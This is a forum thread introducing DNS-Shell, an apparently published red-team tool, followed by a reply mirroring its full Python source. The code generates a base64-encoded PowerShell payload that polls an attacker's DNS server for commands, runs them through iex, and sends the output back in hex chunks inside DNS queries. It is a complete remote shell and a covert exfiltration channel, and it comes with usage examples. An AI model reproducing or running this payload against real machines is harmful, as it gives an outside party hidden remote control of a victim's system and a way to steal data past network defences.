Nytro Posted November 21, 2017 Report Posted November 21, 2017 DNS-shell DNS-Shell is an interactive Shell over DNS channel. The server is Python based and can run on any operating system that has python installed, the payload is an encoded PowerShell command. Understanding DNS-Shell The Payload is generated when the sever script is invoked and it simply utilizes nslookup to perform the queries and query the server for new commands the server then listens on port 53 for incoming communications, once payload is executed on the target machine the server will spawn an interactive shell. Once the channel is established the payload will continously query the server for commands if a new command is entered, it will execute it and return the result back to the server. Sursa: https://github.com/sensepost/DNS-Shell 1 Quote
Active Members Fi8sVrs Posted November 21, 2017 Active Members Report Posted November 21, 2017 mirror: Spoiler import argparse import time import traceback import base64 import re import sys import binascii import threading import SocketServer import requests from dnslib import * def powershell_encode(data): # blank command will store our fixed unicode variable blank_command = "" powershell_command = "" # Remove weird chars that could have been added by ISE n = re.compile(u'(\xef|\xbb|\xbf)') # loop through each character and insert null byte for char in (n.sub("", data)): # insert the nullbyte blank_command += char + "\x00" # assign powershell command as the new one powershell_command = blank_command # base64 encode the powershell command powershell_command = base64.b64encode(powershell_command) return powershell_command def prepare_recursive(domain): st2 = """ $url = "%s"; function execDNS($cmd) { $c = iex $cmd 2>&1 | Out-String; $u = [system.Text.Encoding]::UTF8.GetBytes($c); $string = [System.BitConverter]::ToString($u); $string = $string -replace '-',''; $len = $string.Length; $split = 50; $repeat=[Math]::Floor($len/$split); $remainder=$len%%$split; if($remainder){ $repeatr = $repeat+1}; $rnd = Get-Random;$ur = $rnd.toString()+".CMDC"+$repeatr.ToString()+"."+$url; $q = nslookup -querytype=A $ur; for($i=0;$i-lt$repeat;$i++){ $str = $string.Substring($i*$Split,$Split); $rnd = Get-Random;$ur1 = $rnd.toString()+".CMD"+$i.ToString()+"."+$str+"."+$url; $q = nslookup -querytype=A $ur1; }; if($remainder){ $str = $string.Substring($len-$remainder); $i = $i +1 $rnd = Get-Random;$ur2 = $rnd.toString()+".CMD"+$i.ToString()+"."+$str+"."+$url; $q = nslookup -querytype=A $ur2; }; $rnd=Get-Random;$s=$rnd.ToString()+".END."+$url;$q = nslookup -querytype=A $s; }; while (1){ $c = Get-Random; Start-Sleep -s 3 $u=$c.ToString()+"."+$url;$txt = nslookup -querytype=TXT $u | Out-String $txt = $txt.split("`n") | %%{$_.split('"')[1]} | Out-String if ($txt -match 'NoCMD'){continue} elseif ($txt -match 'exit'){Exit} else{execDNS($txt)} } """ % (domain,) return powershell_encode(st2) def prepare_direct(ip): st2 = """ $ip = "%s" function execDNS($cmd) { $c = iex $cmd 2>&1 | Out-String; $u = [system.Text.Encoding]::UTF8.GetBytes($c); $string = [System.BitConverter]::ToString($u); $string = $string -replace '-',''; $len = $string.Length; $split = 50; $repeat=[Math]::Floor($len/$split); $remainder=$len%%$split; if($remainder){ $repeatr = $repeat+1}; $rnd = Get-Random;$ur = $rnd.ToString()+".CMDC"+$repeatr.ToString()+"."+$url; $q = nslookup -querytype=A $ur $ip; for($i=0;$i-lt$repeat;$i++){ $str = $string.Substring($i*$Split,$Split); $rnd = Get-Random;$ur1 = $rnd.ToString()+".CMD"+$i.ToString()+"."+$str+"."+$url; $q = nslookup -querytype=A $ur1 $ip; }; if($remainder){ $str = $string.Substring($len-$remainder); $i = $i +1 $rnd = Get-Random;$ur2 = $rnd.ToString()+".CMD"+$i.ToString()+"."+$str+"."+$url; $q = nslookup -querytype=A $ur2 $ip; }; $rnd = Get-Random;$s=$rnd.ToString()+".END."+$url;$q = nslookup -querytype=A $s $ip; }; while (1){ Start-Sleep -s 3 $rnd = Get-Random;$u = $rnd.ToString()+"."+$url $txt = nslookup -querytype=TXT $u $ip | Out-String $txt = $txt.split("`n") | %%{$_.split('"')[1]} | Out-String if ($txt -match 'NoCMD'){continue} elseif ($txt -match 'exit'){Exit} else{execDNS($txt)} } """ % (ip,) return powershell_encode(st2) def parse_output(req): global cmd cmd = 'NoCMD' request = req reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q) rdata = A('') TTL = 60 * 5 rqt = rdata.__class__.__name__ cmds.append([request.q.qname.label[1],request.q.qname.label[3]]) if request.q.qname.label[2] == 'sqsp' and request.q.qname.label[1] != 'END' and 'LENGTH' not in cmds: cmds.append('LENGTH') rcvtime = time.time() expected = int(request.q.qname.label[1][4:]) print "[+] Expecting %s Chunks." % request.q.qname.label[1][4:] if request.q.qname.label[2] != 'sqsp': if request.q.qname.label[1] not in cmds: cmds.append(request.q.qname.label[1]) c = request.q.qname.label[2] cm = c.decode('hex') cr.append(cm) sys.stdout.write("\r[+] Chunks Recieved: %d" % len(cr)) sys.stdout.flush() if request.q.qname.label[1] == 'END': cmds.append('END') reply.add_answer(RR(rname=request.q.qname, rtype=1, rclass=1, ttl=TTL, rdata=rdata)) return reply.pack() def parse_newCMD(request): global cmd reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q) TTL = 60 * 5 rdata = TXT(cmd) cmd = 'NoCMD' rqt = rdata.__class__.__name__ reply.add_answer(RR(rname=request.q.qname, rtype=QTYPE.TXT, rclass=1, ttl=TTL, rdata=rdata)) return reply.pack() def dns_response(data): request = DNSRecord.parse(data) qname = request.q.qname qn = str(qname) qtype = request.q.qtype qt = QTYPE[qtype] if qt == 'A': reply = parse_output(request) elif qt == 'TXT': reply = parse_newCMD(request) return reply class BaseRequestHandler(SocketServer.BaseRequestHandler): def get_data(self): raise NotImplementedError def send_data(self, data): raise NotImplementedError def handle(self): try: data = self.get_data() self.send_data(dns_response(data)) except Exception: pass class UDPRequestHandler(BaseRequestHandler): def get_data(self): global newConn,recvConn,client_ip if newConn: newConn = 0 recvConn = 1 client_ip = self.client_address print "[+] Recieved Connection from %s" % client_ip[0] return self.request[0].strip() def send_data(self, data): return self.request[1].sendto(data, self.client_address) def main(penc, WebRequestFile=None,single=None): global cmd,cmds,cr,rcvtime,newCommand,recvConn,client_ip UDP_PORT = 53 s = SocketServer.ThreadingUDPServer(('',UDP_PORT),UDPRequestHandler) thread = threading.Thread(target=s.serve_forever) thread.daemon = True # exit the server thread when the main thread terminates try: thread.start() if WebRequestFile: thread2 = threading.Thread(target=send_reqT, args=(penc,)) thread2.daemon = True thread2.start() else: print "[+] Generated Payload:\n%s" % penc while thread.isAlive(): time.sleep(1) sys.stdout.flush() sys.stderr.flush() if recvConn: if len(cmds) >= 1 and cmds[-1] == 'END' or newCommand: newCommand = 0 print "\n\n%s" % ''.join(cr) print "[+] Command Completed Successfully." cmds = [] cr = [] if single: s.shutdown() sys.exit() else: cmd = raw_input('SensePost-DNS-Shell::$ ') if cmd == 'exit': time.sleep(5) s.shutdown() sys.exit() except KeyboardInterrupt: print "%s" % ''.join(cr) cmd = 'exit' time.sleep(5) #print("[+] 1st packet: %s seconds" % (time.time()-rcvtime)) s.shutdown() sys.exit() except: raise if __name__=='__main__': logo = ''' ________ _______ _________ _________.__ .__ .__ \______ \ \ \ / _____/ / _____/| |__ ____ | | | | | | \ / | \ \_____ \ ______ \_____ \ | | \_/ __ \| | | | | ` \/ | \/ \ /_____/ / \| Y \ ___/| |_| |__ /_______ /\____|__ /_______ / /_______ /|___| /\___ >____/____/ \/ \/ \/ \/ \/ \/ by research (at) SensePost ''' cmds = [] cr = [] rcvtime = 0.0 cmd = 'NoCMD' newCommand = 1 recvConn = 0 newConn = 1 client_ip = None parser = argparse.ArgumentParser( description = ''' A Sort of DNS-SHell. %s ''' % logo, formatter_class=argparse.RawTextHelpFormatter, epilog = ''' Examples: # Generate base64 encoded PowerShell payload, run in listener direct queries mode and wait for interactive shell. sudo python DNS-Shell.py -l -d [Server IP] # Generate base64 encoded PowerShell payload, and run in listener recursive queries mode and wait for interactive shell. sudo python DNS-Shell.py -l -r [Domain]''') parser.add_argument('-l','--listen',help='Activate listener mode.',action='store_true') parser.add_argument('-r','--recursive',help='Recursive DNS query requests.') parser.add_argument('-d','--direct',help='Direct DNS queries mode.') p = parser.parse_args() print logo # listener direct mode if p.listen and p.direct: print '[+} Listen direct queries mode active.' listen = p.listen ip = p.direct penc = prepare_direct(ip) main(penc) # listener recursive mode elif p.listen and p.recursive: print '[+] Listener recursive queries mode active.' listen = p.listen domain = p.recursive penc = prepare_recursive(domain) main(penc) else: parser.print_help() 1 Quote